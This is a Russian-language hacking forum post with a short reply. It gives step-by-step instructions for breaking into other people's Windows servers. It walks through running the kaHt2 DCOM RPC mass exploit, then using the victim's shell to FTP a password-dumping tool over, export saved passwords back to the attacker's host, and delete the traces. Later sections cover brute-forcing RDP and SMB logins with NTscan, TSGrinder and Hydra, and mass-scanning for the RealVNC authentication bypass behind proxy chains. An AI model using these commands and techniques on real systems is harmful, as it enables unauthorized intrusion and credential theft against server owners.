1.эксплоит который мы рассмотрим это kaht2........... Для того,чтобы прваильно заюзать эксплоит нам нужна программа PassViev (только PRO версия):aggressive:,pablos_ftp_server 1.52 ну и сакм кахт2 Для удобства пользования Размещаем софт по винту в определённом порядке. Сам FTPServer, kaHt2.exe и EXPORT.BAT ставим в директорию C:/., А PassViev cуём в папку C:/TEMP (Если её нет, то создайте сами) и переименовываем PassViev.exe в 6.exe (для большего удобства), или в любое другое, на ваш выбор, главное что бы вы потом не мучались набирать это в командной строке. EXPORT.BAT должен находится в одном архиве с КаХтом, если же всё-таки не нашли то создаём EXPORT.BAT файл своими руками в любимом блокноте с текстом @Echo off 6.exe Export.txt и сохраняем как EXPORT.BAT. Всё Батник готов. Заметьте: во второй строке стоит 6.exe, это то имя в которое вы переименовали свой PassViev. Если Вы переименовали в другое то в напишите именно его в батнике EXPORT.BAT. Теперь давайте настроим FTP сервер на своём компутере. Запустите FTPServer и войдите в User accounts, нажимаем ADD, Вас просят ввести имя юзера, пишем: a. Далее вас просят выбрать каталог куда будут заливатся стыренные файлы, выберете папку темп которую мы недавно с Вами создавали на диске ЦЕ. Потом Вас просят ввести пароль для юзера a, парольставим тоже: a. Потом проставляем везде галочки. Теперь все изменения сохраняем и приступаем к основным действиям. Открываем диск C:, убеждаемся что там присутствует КаХт. Потом Запускаем командную строку (пуск>программы>стандартные>командная строка). Перетаскиваем КаХт с папки в комндную строку (нажмите на КаХт левой кнопкой мыши и перетеащите в окно консоли). Далее появляется текст: C:>C:kahHt2.exe Продолжаем эту строку: пробел Должно получится: C:>C:kaHt2.exe 192.168.0.1 192.168.0.245 (пример на моей локалке, у Вас же диапазон может быть другой) Жмём Enter. Перед Вами появляется: PHP: KAHT II - MASSIVE RPC EXPLOIT DCOM RPC exploit. Modified by aT4@3wdesign.es #haxorcitos && #localhost @Efnet Ownz you!!! PUBLIC VERSION :P ____________________________________________ [+] tARGETS : 192.168.0.1-192.168.0.245 WITH 50 tHREADS [+] Attacking Port: 135. Remote Shell port: 32968 [+] Scan In Progress... - Connecting to 192.168.0.8 Sending Exploit to a [WinXP] Server... FAILED - Connecting to 192.168.0.13 ну короче говоря ещё всякое дерьмо появится которое нам не надо. В итоге когда сканер найдёт потенциальную жертву появится : Microsoft Windows XP [Версия 5.1.2600] (С) Корпорация Майкрософт, 1985-2001. C:windowssystem32> Всё, можешь радоваться, ты на чужом компе в директории SYSTEM32. Далее в консоли пишем: cd.. Жмём Enter видим C:windows> cd..Жмём Enter видим C: Теперь с помощью команды cd program files перейдём в папку С:Program Files. Видим: C:Program files сюда мы перешли чтоб особо не палится Далее узнаём свой IP адрес. Для премера будем использовать мой в локалке 192.168.0.7 Пишем в консоли: C:Program files>echo open 57.66.158.44>go.txt&&echo a>>go.txt&&echo a>>go.txt жмем Enter Видим: C:Program files> Это мы с Вами создали текстовый документ (он нам понадобится для соединения с вашим FTP сервером) в папке Program files на удалённой машине, в котором содержится 3 строки: open 57.66.158.44 a a Буквы a, это имя и пароль которые Вы создали в FTPServer`е. Теперь запускаем FTPServer , нажимаем на зелёную стрелочку в левом верхнем углу программы. Вам написали, что сервер запущен. Теперь коннектим удалённый комп к себе по FTP. Пишем в командной строке: C:Program files>ftp -s:go.txt В своём FTP сервере, в раздел Server Log ты должен увидеть следующее: FTP Server started on port 21 [3892] Client connected from IP [3892] Welcome to Pablo's FTP Server [3892] USER a [3892] 331 Password required for a [3892] PASS a [3892] 230 User successfully logged in. Это всё означает, что ты всё правильно сделал и законнектил вражеский комп к себе на ФТП, далее на надо залить PAssView.exe (мы переименовали его в 6.exe) на этот комп. Пишем get 6.exe жмём Enter В своём FTP сервере, в раздел Server Log ты должен увидеть следующее: [1456] PORT IP [1456] 200 Port command successful. [1456] STOR 6.exe [1456] 150 Opening BINARY mode data connection for file transfer [1456] 226 Transfer complee В консоли Пишем get export.bat жмём Enter - это мы отправили наш батник, видим В своём FTP сервере, в раздел Server Log ты должен увидеть следующее [1456] PORT IP [1456] 200 Port command successful. [1456] STOR Export.bat [1456] 150 Opening BINARY mode data connection for file transfer [1456] 226 Transfer complee Всё, мы отправили необходимые файлы на комп жертвы. Теперь пишем bye - это мы отсоединяем комп от нашего ФТП сервера. и снова мы видим: C:Program files> Пишем C:Program files>export.bat это мы запустили export.bat который соберёт нам все наши пароли и сохранит их в файле export.txt Для больше уверенности в том что export.txt уже создан наберите в консоли: C:Program files>dir И Вы увидите все файлы и папки в директории C:Program files, там же увидите и наши закаченные файлы. И наконец последний шаг. Снова коннектим комп по ФТП: C:Program files>ftp -s:go.txt жмём Enter В своём FTP сервере, в раздел Server Log ты должен увидеть следующее: Вы снова увидите: FTP Server started on port 21 [3892] Client connected from IP [3892] Welcome to Pablo's FTP Server [3892] USER a [3892] 331 Password required for a [3892] PASS a [3892] 230 User successfully logged in. Сразу после этого в консоли вводите: send export.txt В своём FTP сервере, в раздел Server Log ты должен увидеть следующее: [1456] PORT IP [1456] 200 Port command successful. [1456] STOR export.txt [1456] 150 Opening BINARY mode data connection for file transfer. [1456] 226 Transfer complete Это означает что мы скопривали себе в папку TEMP,которую создавали на диске ЦЕ, файл export.txt Далее заметаем следы: пишем bye жмём ввод И снова видим: C:Program files> Далее поочерёдно вводим команды для удаления закаченных нами файлов: del go.txt del 6.exe del export.bat del export.txt Скачать кахт можнотут 2.Брут дедиков Как мы все знаем брутер это самый эффективный и тупой метод взлом асек,дедиков and etc Рассмотрим некоторые брутеры дедиков: Самый известный брутер для дедиков это Ntscan Делает она следующее: при выборе определённого диапазона она сканирует сервера на предмет простых паролей (simple passwords). Программа имеет довольно неплохой выбор метода атаки, и вероятность взлома сервером с её помощью очень велика, так как админы часто ставят простые пароли к серверу, особенно на забугорных. Прога работает по принципу брута: посылает запрос на авторизацию на сервере и получает ответ от севера. В случае успешной авторизации выводит список серверов в нижней части программы. Теперь главное выбрать диапазон сканирования и настроить программу для эффективной работы. Сверху мы вписываем диапазон IP серверов, как вы наверно уже поняли. Далее, HostFile - список хостов (я не использовал эту опцию), здесь можно создать файл с конкретными хостами и брутить конкретные хосты. Потоки я оставлял как есть: 50, Timeout - аналогично. ConnectShare - подключение к расшаренным ресурсам. Можно выбирать метод атаки: IPCscan, SMBscan, WMIscan. Далее, "ping from host" - пинговать хосты, то есть проверка на живучесть хоста, перед попыткой атаки, чтобы не брутить в холостую мёртвые хосты. Scan host opened port - сканировать хосты с открытым портом 139, но так же можно и изменить при желании. Speed - скорость работы брута (перебора паролей). TSGrinder 2.03 Программа для подбора паролей к MS RDP службе. Поддерживает множество потоков, баннеры входа в систему, l33t преобразование. Программа требует установки Microsoft Simulated Terminal Server Client tool, "roboclient". DownLoad Также дедики можно брутить прогой Hydra 3.[/B]Добыча дедиков от Te$t[/B] Первое, что нам нужно это прямые руки, свежая или чуть пьяная голова =) FreeCap - Предназначен для соксификации программ не умеющих работать с прокси серверами самостоятельно. Пару SOCKS-проксов для безопасности, а лучше цепочку . Здесь я не буду описывать принцип работы с этой программой, но вы знайте, что все действия я проделываю именно через нее... Начнем. Искать мы будем vnc-server т.е. Virtual Network Computing. Первое что нам нужно, это хороший VNC-сканер, я знаю 2 сканера: это PHP-сканер от Гемаглобина и RealVNC Bypass Authentication Scanner Свой выбор я оставил за RealVNC Bypass Authentication Scanner, т.к. он прост в использовании и реально ищет по диапазонам, а нам это и нужно. Итак скачиваем данный сканер, распаковываем его к примеру в: X:\XXX\ где Х - буква вашего диска, а ХХХ - папка куда вы его распаковали. И запускаем из cmd.exe Пример: cd X:\XXX - переходим в папку со сканером Х:\XXX\VNC.exe - запускаем сканер, где он нам выдаст следущую информацию: Code: Microsoft Windows XP [Версия 5.1.2600] (С) Корпорация Майкрософт, 1985-2001. X:\>VNC.exe ================================================[rev-0.0.1]== ========RealVNC <= 4.1.1 Bypass Authentication Scanner======= ============multi-threaded for Linux and Windows============= ================================================== ==[win32]== MAIN MENU ================================================== =========== [+] Usage: VNC_bypauth <target> <scantype> <option> [-] <target>: ___________________ |___-p____|___-i____| [-] <scantype>: ____________________ |___-cT___|___-vnc___| [-] <option>: __________________________________________________ ______ |___-v____|___-vv____|___-T___|__-tc___|__-tr___|__-tt___| [+] Type VNC_bypauth <target>,<scantype> or <option> for more informations [+] To increase the speed under linux, try ulimit -s unlimited X:\> Осюда мы видим набор ключей по работе со сканером... Вбиваем далее: X:\XXX\VNC.exe -i XXX.XXX.XXX.XXX-XXX.XXX.XXX.XXX -p5900 -vnc где: -i диапазон ip -р порт -vnc Виртуальные сервера В то-же время в папке \ХХХ\ у нас появляеться файл VNC_bypauth.txt, куда сохраняются все результаты программы. Открываем и видим: Code: --------------------------------------------------------------------------- COMMAND: VNC.exe -i xxx.xx.xxx.x-xxx.xxx.xxx.xxx -p 5900 -vnc ---------------------------------------------------------------------------- xxx.xx.xxx.xx :5900 vnc4: banned xxx.xx.xxx.xx :5900 vnc4: nothing received xxx.xx.xxx.x :5900 connection closed xxx.xx.xxx.xxx :5900 vnc4: patched xxx.xx.xxx.xxx :5900 vnc4: VULNERABLE ---------------------------------------------------------------------------- Scan complete --------------------------------------------[heapoverflow.com 2004-2005]---- из результата видно, что сканер понятным образом сохраняет результаты, где бажные сервера подписаны как VULNERABLE, с такими мы и будем работать... Теперь к нам на помощь приходит программа BL4CK-vncviewer-authbypass она позволяет подключится к бажному серверу, на подобии Подключение к удаленному рабочему столу(mstsc.exe) Способ №2 Ищем и качаем программу DSNS v. 1.0 очень хороший между прочим сканер портов . Вбиваем диапазон, порт и ждем, через некоторое время сканер выдает нам много открытых портов =). После окончания сканировнаия, сохраняем данный диапазон в Results\Export results одним диапазоном, без портов. Теперь настала очередь программы VNCMASS, в которую мы вбиваем только что насканеные диапазоны и давим Start All. Программа прочекает и автоматически подключиться к бажным дедикам.. Вот и все. Советую работать со сканерами через дедики, т.к. вбили диапазон и пошли спать, а наутро подключились и смотрим результаты. Ссылки на скачивание: RealVNC Bypass Authentication Scanner DSNS v. 1.0 (С)Собрал способы DUN
ТС, ты бы сначала тему топика правильно написал.. вообще то не Dedical сервер, а Dedicated сервер... написано много, но все это уже давно есть.. да и тулзы слишком стары...